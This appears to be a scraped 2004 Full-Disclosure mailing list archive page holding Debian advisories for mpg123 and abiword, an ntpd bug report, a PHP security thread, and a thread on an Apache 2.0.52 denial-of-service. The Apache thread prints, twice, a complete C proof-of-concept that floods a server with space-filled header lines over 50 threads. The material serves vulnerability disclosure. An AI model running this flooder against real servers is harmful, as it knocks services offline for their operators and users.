|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- application/octet-stream attachment: Price.scr
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] [SECURITY] [DSA 578-1] New mpg123 packages fix arbitrary code execution
debian-security-announce
lists.debian.org
Date: Mon Nov 01 2004 - 07:33:16 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --------------------------------------------------------------------------
Debian Security Advisory DSA 578-1 security
debian.org
http://www.debian.org/security/ Martin Schulze
November 1st, 2004 http://www.debian.org/security/faq
- --------------------------------------------------------------------------
Package : mpg123
Vulnerability : buffer overflow
Problem-Type : remote
Debian-specific: no
CVE ID : CAN-2004-0982
Carlos Barros has discovered a buffer overflow in the HTTP
authentication routine of mpg123, a popular (but non-free) MPEG layer
1/2/3 audio player. If a user opened a malicious playlist or URL, an
attacker might execute arbitrary code with the rights of the calling
user.
For the stable distribution (woody) this problem has been fixed in
version 0.59r-13woody4.
For the unstable distribution (sid) this problem has been fixed in
version 0.59r-17.
We recommend that you upgrade your mpg123 package.
Upgrade Instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 3.0 alias woody
- --------------------------------
Source archives:
http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r-13woody4.dsc
Size/MD5 checksum: 748 386de2941605795a833ccdddf200f26b
http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r-13woody4.diff.gz
Size/MD5 checksum: 24568 bf98712baa4bb429768762ea9c20404a
http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r.orig.tar.gz
Size/MD5 checksum: 159028 95df59ad1651dd2346d49fafc83747e7
Alpha architecture:
http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r-13woody4_alpha.deb
Size/MD5 checksum: 94630 18738b85cf26807ea4d29b1c82767d63
http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123-esd_0.59r-13woody4_alpha.deb
Size/MD5 checksum: 94590 f550ba5af79ae1bf5f8024178c391e0c
ARM architecture:
http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r-13woody4_arm.deb
Size/MD5 checksum: 89708 6b5bc7522cf6e91c7ec21662f8809bc3
Intel IA-32 architecture:
http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r-13woody4_i386.deb
Size/MD5 checksum: 81688 9c5fb2322632dc72d64e18ec404abad8
http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123-esd_0.59r-13woody4_i386.deb
Size/MD5 checksum: 81642 a06e8185f9b0da320ab46c348e55be5a
http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123-nas_0.59r-13woody4_i386.deb
Size/MD5 checksum: 83626 a00b78f948d8967ec23cb2874847f638
http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123-oss-3dnow_0.59r-13woody4_i386.deb
Size/MD5 checksum: 81334 204b7db5b537d81741f04dee9bf80a40
http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123-oss-i486_0.59r-13woody4_i386.deb
Size/MD5 checksum: 87940 0c9d0b30b8a832f30de5cc3d29c321b0
HP Precision architecture:
http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r-13woody4_hppa.deb
Size/MD5 checksum: 97516 428e9dd2c7805424976c82f7aa37e54b
Motorola 680x0 architecture:
http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r-13woody4_m68k.deb
Size/MD5 checksum: 75998 b08ad56ec624c0f8a3624596cef423ea
PowerPC architecture:
http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r-13woody4_powerpc.deb
Size/MD5 checksum: 88528 442b5e1d2462121fcfb1c4eda82429f3
http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123-esd_0.59r-13woody4_powerpc.deb
Size/MD5 checksum: 88448 d885597a3cb24ae2d92309def283ab5b
Sun Sparc architecture:
http://security.debian.org/pool/updates/non-free/m/mpg123/mpg123_0.59r-13woody4_sparc.deb
Size/MD5 checksum: 88776 b905ba3b69cc2196cc9d84ddefb9b16b
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce
lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)
iD8DBQFBhjsbW5ql+IAeqTIRApHrAJ4m83ekW9Gm+H/Ke4sp+RMASjwjbwCfYUU1
ro+9qiQHpADqYb3mbusTkg8=
=YBAn
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] ntpd segfaults accessing IPv6 hosts
From: Bernhard Kuemel (bernhard
bksys.at)
Date: Mon Nov 01 2004 - 08:12:26 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi full-disclosure!
ntpd 1:4.2.0a-11 (as in debian testing/sarge and unstable/sid)
segfaults when accessing ntp servers on IPv6 hosts. I don't know
whether this bug is exploitable. But such a server on
pool.ntp.org might DoS many servers.
There is a fixed version available.
For more details see http://bugzilla.ntp.org/show_bug.cgi?id=353
Bernhard
--
Webspace; Low end Serverhousing ab 15 e, etc.: http://www.bksys.at
Linux Admin/Programmierer: http://bksys.at/bernhard/services.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] DoS in Apache 2.0.52 ?
From: Chintan Trivedi (chesschintan
gmail.com)
Date: Mon Nov 01 2004 - 08:46:23 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
I had tested first time on vmware image and it had crashed.(Its not
having unnecessary modules installed. )
The other tests which i did was on office mate's machine. That guy is
running http apache server with (Mandrake Linux/6mdk) mod_ssl
OpenSSL/0.9.7c DAV/2 PHP/4.3.4 Server. His machine had come back to
normal state after long time. But when i had tried 3-4 times in
succession in very short intervals, the machine stopped responding.
I see that IIS 5.1 treats any line containing only <space> as a blank
line and terminates the connection. Why does apache have to wait till
8K x 8K spaces ?
On Mon, 01 Nov 2004 11:02:20 -0300, Mauro Flores <almauri
cs.com.uy> wrote:
> I made a Linux version of your PoC and attack an Apache 2.0.52 +
> Mod_security + Mod_ssl + Mod_proxy and couldn't reproduce the DoS.
> 50 threads for more than 5 minutes throw Internet (not in the local
> network).
>
> Regards, Mauro Flores
>
>
>
> On Mon, 2004-11-01 at 06:57, Chintan Trivedi wrote:
> > Hi,
> >
> > I was doing some testing on Apache webserver ver 2.0.52 (unix) and
> > previous versions. Just found that a special type of request consumes
> > lot of CPU usage and hangs the webserver. It even hangs other services
> > like ssh, ftp ..
> >
> > For Apache 2.0.52 a request like
> > GET / HTTP/1.0\n
> > [space] x 8000\n
> > [space] x 8000\n
> > [space] x 8000\n
> > .
> > .
> > 8000 times
> >
> > consumes a lot of cpu.
> >
> > I created 25 threads (connections) and send the above request to one
> > webserver. After just 2-3 minutes of flooding, the server wasnt able
> > to fulfill any http requests. Even ssh and such other services well
> > also hanged up. The time required for the attack was just maximum 5
> > minutes.
> >
> > I am not sure whether it is a valid DoS or not. Replacing the <space>
> > with any other char will break the connection just after a few
> > lines(130 or so) of header. Checking the
> > httpd-2.0.52/server/protocol.c file i see the code for the mime
> > headers. It checks for the first char of the header. If it is a "space" it
> > considers it as an extension to the previous line header. The problem
> > seems to be similar to the advisory published by Guninsky few weeks
> > ago -> http://www.guninski.com/httpd1.html thought its a bit
> > different. That fix was for the long request field header when the
> > header line is extended in the next line using space.
> >
> > Well i guess 8K limit for the number of headers filled with spaces is
> > quite huge. Its enuf to DoS the server using a few threads.
> >
> > You can check the attached C file to test it. The file is compiled on
> > windows system using VC++ 6.0.
> >
> > -----------------POC----------------------------
> > /// Apache 2.0.52 and earlier DoS
> >
> > #include "stdafx.h"
> > #include "winsock.h"
> > #include "string.h"
> > #include "stdio.h"
> > #include "windows.h"
> > #pragma comment(lib,"ws2_32")
> >
> > DWORD WINAPI attack(LPVOID);
> > char target[256];
> >
> > int main(int argc, char* argv[])
> > {
> > int l=0;
> > int j;
> > DWORD dw;
> > HANDLE hd;
> > if(argc<2)
> > {
> > printf("usage: %s target", argv[0]);
> > exit(0);
> > }
> >
> > strncpy(target, argv[1], 256);
> > printf("Attaching %s ...\n", target);
> > for(j=0;j<50;j++)
> > hd=CreateThread(NULL,0, attack, (LPVOID) l , 0, &dw);
> >
> > for(j=0;j<50;j++)
> > WaitForSingleObject(hd, INFINITE);
> >
> > printf ("done");
> > return 0;
> > }
> >
> > DWORD WINAPI attack(LPVOID l)
> > {
> > int s;
> > SOCKADDR_IN sck;
> > HOSTENT *host;
> > char buff[256];
> > char space[8000];
> > int i;
> >
> > WSADATA wsadata;
> >
> > WSAStartup(MAKEWORD(1,1),&wsadata);
> >
> > memset(space, ' ', 8000);
> > space[7998]='\n';
> > space[7999]='\0';
> >
> > if((host=gethostbyname(target))==NULL)
> > {
> > printf("Host not found");
> > return -1;
> > }
> > sck.sin_family = PF_INET;
> > memcpy(&sck.sin_addr.s_addr, host->h_addr, host->h_length );
> > sck.sin_port = htons(80);
> >
> > if((s=socket(AF_INET,SOCK_STREAM,0))==-1)
> > {
> > printf("Socket couldn't be initiallized");
> > return -1;
> > }
> > if((connect(s,(struct sockaddr *)&sck,sizeof(sck))))
> > {
> > printf("Couldn't connect");
> > return -1;
> > }
> >
> > sprintf(buff, "GET / HTTP/1.0\n");
> > //printf("%s",buff);
> > int len=strlen(buff);
> >
> > if((send(s,buff,len,0))==-1)
> > {
> > printf ("send error");
> > closesocket(s);
> > return -1;
> > }
> >
> > for(i=0;i<9999;i++)
> > {
> >
> > if((send(s,space,strlen(space),0))==-1)
> > {
> > printf("Send Error on header number %d", i);
> > closesocket(s);
> > return -1;
> > }
> >
> > }
> > closesocket(s);
> > return 0;
> > }
> > ------------------------------------------------
> >
> > _______________________________________________
>
>
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] DoS in Apache 2.0.52 ?
From: Mauro Flores (almauri
cs.com.uy)
Date: Mon Nov 01 2004 - 08:02:20 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
I made a Linux version of your PoC and attack an Apache 2.0.52 +
Mod_security + Mod_ssl + Mod_proxy and couldn't reproduce the DoS.
50 threads for more than 5 minutes throw Internet (not in the local
network).
Regards, Mauro Flores
On Mon, 2004-11-01 at 06:57, Chintan Trivedi wrote:
> Hi,
>
> I was doing some testing on Apache webserver ver 2.0.52 (unix) and
> previous versions. Just found that a special type of request consumes
> lot of CPU usage and hangs the webserver. It even hangs other services
> like ssh, ftp ..
>
> For Apache 2.0.52 a request like
> GET / HTTP/1.0\n
> [space] x 8000\n
> [space] x 8000\n
> [space] x 8000\n
> .
> .
> 8000 times
>
> consumes a lot of cpu.
>
> I created 25 threads (connections) and send the above request to one
> webserver. After just 2-3 minutes of flooding, the server wasnt able
> to fulfill any http requests. Even ssh and such other services well
> also hanged up. The time required for the attack was just maximum 5
> minutes.
>
> I am not sure whether it is a valid DoS or not. Replacing the <space>
> with any other char will break the connection just after a few
> lines(130 or so) of header. Checking the
> httpd-2.0.52/server/protocol.c file i see the code for the mime
> headers. It checks for the first char of the header. If it is a "space" it
> considers it as an extension to the previous line header. The problem
> seems to be similar to the advisory published by Guninsky few weeks
> ago -> http://www.guninski.com/httpd1.html thought its a bit
> different. That fix was for the long request field header when the
> header line is extended in the next line using space.
>
> Well i guess 8K limit for the number of headers filled with spaces is
> quite huge. Its enuf to DoS the server using a few threads.
>
> You can check the attached C file to test it. The file is compiled on
> windows system using VC++ 6.0.
>
> -----------------POC----------------------------
> /// Apache 2.0.52 and earlier DoS
>
> #include "stdafx.h"
> #include "winsock.h"
> #include "string.h"
> #include "stdio.h"
> #include "windows.h"
> #pragma comment(lib,"ws2_32")
>
> DWORD WINAPI attack(LPVOID);
> char target[256];
>
> int main(int argc, char* argv[])
> {
> int l=0;
> int j;
> DWORD dw;
> HANDLE hd;
> if(argc<2)
> {
> printf("usage: %s target", argv[0]);
> exit(0);
> }
>
> strncpy(target, argv[1], 256);
> printf("Attaching %s ...\n", target);
> for(j=0;j<50;j++)
> hd=CreateThread(NULL,0, attack, (LPVOID) l , 0, &dw);
>
> for(j=0;j<50;j++)
> WaitForSingleObject(hd, INFINITE);
>
> printf ("done");
> return 0;
> }
>
> DWORD WINAPI attack(LPVOID l)
> {
> int s;
> SOCKADDR_IN sck;
> HOSTENT *host;
> char buff[256];
> char space[8000];
> int i;
>
> WSADATA wsadata;
>
> WSAStartup(MAKEWORD(1,1),&wsadata);
>
> memset(space, ' ', 8000);
> space[7998]='\n';
> space[7999]='\0';
>
> if((host=gethostbyname(target))==NULL)
> {
> printf("Host not found");
> return -1;
> }
> sck.sin_family = PF_INET;
> memcpy(&sck.sin_addr.s_addr, host->h_addr, host->h_length );
> sck.sin_port = htons(80);
>
> if((s=socket(AF_INET,SOCK_STREAM,0))==-1)
> {
> printf("Socket couldn't be initiallized");
> return -1;
> }
> if((connect(s,(struct sockaddr *)&sck,sizeof(sck))))
> {
> printf("Couldn't connect");
> return -1;
> }
>
> sprintf(buff, "GET / HTTP/1.0\n");
> //printf("%s",buff);
> int len=strlen(buff);
>
> if((send(s,buff,len,0))==-1)
> {
> printf ("send error");
> closesocket(s);
> return -1;
> }
>
> for(i=0;i<9999;i++)
> {
>
> if((send(s,space,strlen(space),0))==-1)
> {
> printf("Send Error on header number %d", i);
> closesocket(s);
> return -1;
> }
>
> }
> closesocket(s);
> return 0;
> }
> ------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] How secure is PHP ?
From: Meder Kydyraliev (meder
o0o.nu)
Date: Mon Nov 01 2004 - 08:29:04 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
You should check out 'study in scarlet' also, which points out some of the
common programming/configuration mistakes:
http://www.securereality.com.au/studyinscarlet.txt
Meder
On Mon, Nov 01, 2004 at 07:13:14PM +0530, Sandeep Sengupta wrote:
> Hi Nayana,
>
> 1) All BUGS on PHP are listed here. So you can have good idea of the bug-stat.
> http://bugs.php.net/bugstats.php
>
> Total bug entries in system: 30352
> Closed: 17087 Open: 1267 Critical: 4
>
> -----
>
> Some more resources ---
>
> 2) http://www.developer.com/lang/article.php/918141
> On the Security of PHP, Part 1 - Jordan Dimov
>
> 3) http://www.devshed.com/c/a/PHP/PHP-Security-Mistakes/
> PHP Security Mistakes - Dave Clark
>
> The security of the application depends mostly on 'how you code',
> which I believe you already know. I hope the above links will be of
> some help. Good luck :-)
>
> Warm regards,
> Sandeep.
>
> -----Original Message-----
> From: Nayana Somaratna [mailto:npsomaratna
gmail.com]
> Sent: Tue 02/11/2004 00:45
> To: full-disclosure
lists.netsys.com
> Cc:
> Subject: [Full-Disclosure] How secure is PHP ?
> Hi everyone,
>
> I've been tasked with creating a learning management system for my
> University. Given that we're only handling a few handred students, I'd
> typically want to create it using linux/apache/mysql/php.
>
> However, when browsing the web, I found an article which said that "it
> requires an expert to lockdown php" (Sorry, but I can't quite recall
> the URL).
>
> While I am not a novice, I am defintely not an expert either -
> expecially on security issues.
>
> So, I'd like to ask the members of this list - how difficult is it to
> secure php ? Do you really need a security "expert" to do this ?
>
> P.S. The few hundred students mentioned above are IT students ;-)
>
> Thanks,
>
> - Nayana
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] DoS in Apache 2.0.52 ?
From: Michal Zalewski (lcamtuf
ghettot.org)
Date: Mon Nov 01 2004 - 09:38:42 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
On Mon, 1 Nov 2004, Chintan Trivedi wrote:
> GET / HTTP/1.0\n
> [space] x 8000\n
> [space] x 8000\n
> [space] x 8000\n
> .
> .
> 8000 times
> I created 25 threads (connections) and send the above request to one
> webserver.
This is circa 1.5 GB of data (61 MB per connection), at which point you
probably either caused an (improperly configured) server to kill random
processes on OOM, or swapped it to death.
This seems to be a valid DoS, and Apache most certainly should refuse such
an attack (historically, they had several other header parsing flaws).
This attack is probably not particularly efficient, compared to, say, a
good old connection flood, should you have 1.6 GB of bandwidth to spare.
/mz
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] [SECURITY] [DSA 579-1] New abiword packages fix arbitrary code execution
debian-security-announce
lists.debian.org
Date: Mon Nov 01 2004 - 09:51:45 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --------------------------------------------------------------------------
Debian Security Advisory DSA 579-1 security
debian.org
http://www.debian.org/security/ Martin Schulze
November 1st, 2004 http://www.debian.org/security/faq
- --------------------------------------------------------------------------
Package : abiword
Vulnerability : buffer overflow
Problem-Type : remote
Debian-specific: no
CVE ID : CAN-2004-0645
A buffer overflow vulnerability has been disovered in the wv library,
used for converting and previewing word documents. On exploition an
attacker could execute arbitrary code with the privileges of the user
running the vulnerable application.
For the stable distribution (woody) this problem has been fixed in
version 1.0.2+cvs.2002.06.05-1woody2.
The package in the unstable distribution (sid) is not affected.
We recommend that you upgrade your abiword package.
Upgrade Instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 3.0 alias woody
- --------------------------------
Source archives:
http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2.dsc
Size/MD5 checksum: 1159 85bb20f96162736e29ade8d6558799d6
http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2.diff.gz
Size/MD5 checksum: 48982 12356a29a3185ef367fd7a18a7374be0
http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05.orig.tar.gz
Size/MD5 checksum: 16407034 0b0e1f3e42a0627a28cea970b099049d
Architecture independent components:
http://security.debian.org/pool/updates/main/a/abiword/abiword-doc_1.0.2+cvs.2002.06.05-1woody2_all.deb
Size/MD5 checksum: 950160 e102efac6a16ded87e5e437f687a0310
http://security.debian.org/pool/updates/main/a/abiword/xfonts-abi_1.0.2+cvs.2002.06.05-1woody2_all.deb
Size/MD5 checksum: 189372 96b1fd88bd7c779e692d1f97f4884992
Alpha architecture:
http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_alpha.deb
Size/MD5 checksum: 12324 db3b4b84b9fe45dcbd3c2e50bdf3ea08
http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_alpha.deb
Size/MD5 checksum: 538558 745ddd234eebaba2d94b4dcb8482eb58
http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_alpha.deb
Size/MD5 checksum: 2069076 b15d6f04af7fe12637fbf3f98bff3570
http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_alpha.deb
Size/MD5 checksum: 1873718 f3c06b0ab36204d17bd7f35b8aaa9d9c
http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_alpha.deb
Size/MD5 checksum: 228192 0f93acbe004457b96665dfd404eb7a0d
ARM architecture:
http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_arm.deb
Size/MD5 checksum: 12324 d79bb97457548ab36052e0e311168ac5
http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_arm.deb
Size/MD5 checksum: 536122 c9a40134dad59a82a902e734c8011f78
http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_arm.deb
Size/MD5 checksum: 1716898 e16c92223a1d79b11e13723dfe440b70
http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_arm.deb
Size/MD5 checksum: 1533466 519589fac25720cb9932949a16e435e9
http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_arm.deb
Size/MD5 checksum: 154748 69f4844084b35e02af75d2350970ae5f
Intel IA-32 architecture:
http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_i386.deb
Size/MD5 checksum: 12316 56e899f5073f4ecf10b6cb29802da76f
http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_i386.deb
Size/MD5 checksum: 533908 f3d4e7035c0d0e9fcf6c53386f9305f6
http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_i386.deb
Size/MD5 checksum: 1677628 bafc31f34a7f940268acb69e708db7c8
http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_i386.deb
Size/MD5 checksum: 1491442 a87d8c81b54987eee14cfa5ad4cfa599
http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_i386.deb
Size/MD5 checksum: 219836 2de08d80c8581d9814047c11e41d98fc
Intel IA-64 architecture:
http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_ia64.deb
Size/MD5 checksum: 12326 16aae240a8308465fcc04e7f9697d64a
http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_ia64.deb
Size/MD5 checksum: 542536 e9fcc8cb137cde1015f854c6383e803f
http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_ia64.deb
Size/MD5 checksum: 2121940 fb962d5debe790b0a9ea5da9b82f1500
http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_ia64.deb
Size/MD5 checksum: 1939620 d84fc2069f1af2ce581f6a876179c567
http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_ia64.deb
Size/MD5 checksum: 311806 1664fc9ec9ed17f7c355aa2b27c9cb27
HP Precision architecture:
http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_hppa.deb
Size/MD5 checksum: 12322 fbe7366ac7c2d84eaa840c29bb0f0870
http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_hppa.deb
Size/MD5 checksum: 537778 0e13ea49a4bf688b99297c6fa60ddbe0
http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_hppa.deb
Size/MD5 checksum: 2039786 f91d12d4d6ba552a42cf4562d358f5f3
http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_hppa.deb
Size/MD5 checksum: 1821044 ed470c31af565d3a836dbaed6b5956c9
http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_hppa.deb
Size/MD5 checksum: 195742 8f70554c0e9fab92c733e084ac435796
Motorola 680x0 architecture:
http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_m68k.deb
Size/MD5 checksum: 12326 fda3aee08b6c7a36552c44c9e18dc2f3
http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_m68k.deb
Size/MD5 checksum: 533074 623de2757f85e5f40404ad7178600900
http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_m68k.deb
Size/MD5 checksum: 1602602 71341f13227b14ebebbdab7307170e5e
http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_m68k.deb
Size/MD5 checksum: 1416262 4123606f88103837cb0b1716e5332edc
http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_m68k.deb
Size/MD5 checksum: 199616 c8cbb04072b54b12e5d790d190ed5e20
Big endian MIPS architecture:
http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_mips.deb
Size/MD5 checksum: 12324 2a9e9d8590cbff7e6eae6210dcda5963
http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_mips.deb
Size/MD5 checksum: 536334 34b58292b19a97c7caf03fa8649f9588
http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_mips.deb
Size/MD5 checksum: 1701150 4233b20af6d518aef680721c6e9d224f
http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_mips.deb
Size/MD5 checksum: 1513420 4e9ff72a764e615974d97bd1078955b6
http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_mips.deb
Size/MD5 checksum: 205038 d02601a4bf14e98e8b43f0773b25e0c4
Little endian MIPS architecture:
http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_mipsel.deb
Size/MD5 checksum: 12322 33fbc540d53404e519a6696930e94193
http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_mipsel.deb
Size/MD5 checksum: 536470 367d3892a482f12e69f4a78ab94925b9
http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_mipsel.deb
Size/MD5 checksum: 1663230 72a084359b72dbb54d77ccf5fc2dbc5f
http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_mipsel.deb
Size/MD5 checksum: 1480868 f3e424b1b36eef3bcb52c422e36393ec
http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_mipsel.deb
Size/MD5 checksum: 202908 a145263d08da2e5dad0d611869180def
PowerPC architecture:
http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_powerpc.deb
Size/MD5 checksum: 12316 e4d9763a95a99175919c1da05fbd35d7
http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_powerpc.deb
Size/MD5 checksum: 534710 596bbd310236e97c3d967ff6fac45e2a
http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_powerpc.deb
Size/MD5 checksum: 1716300 a77a54353c0f17ae35f363931dae7d47
http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_powerpc.deb
Size/MD5 checksum: 1527752 1d6a0d11fb0a4c0d59e3a84b9457964d
http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_powerpc.deb
Size/MD5 checksum: 211422 bdf81bbb6ad1e18ba5140a06d4ba6493
IBM S/390 architecture:
http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_s390.deb
Size/MD5 checksum: 12322 41066489465b7dc84e7512a8b2467215
http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_s390.deb
Size/MD5 checksum: 535134 7bee77890a9237f6a45d44c9a6fa3fb0
http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_s390.deb
Size/MD5 checksum: 1603758 13a836f504b4698bce96b010e6c6a1ef
http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_s390.deb
Size/MD5 checksum: 1417836 da47311e33507bccba7da3ff9eb9a890
http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_s390.deb
Size/MD5 checksum: 203140 bdaa7fe49b1fb7097e9bf7d8fec42d5c
Sun Sparc architecture:
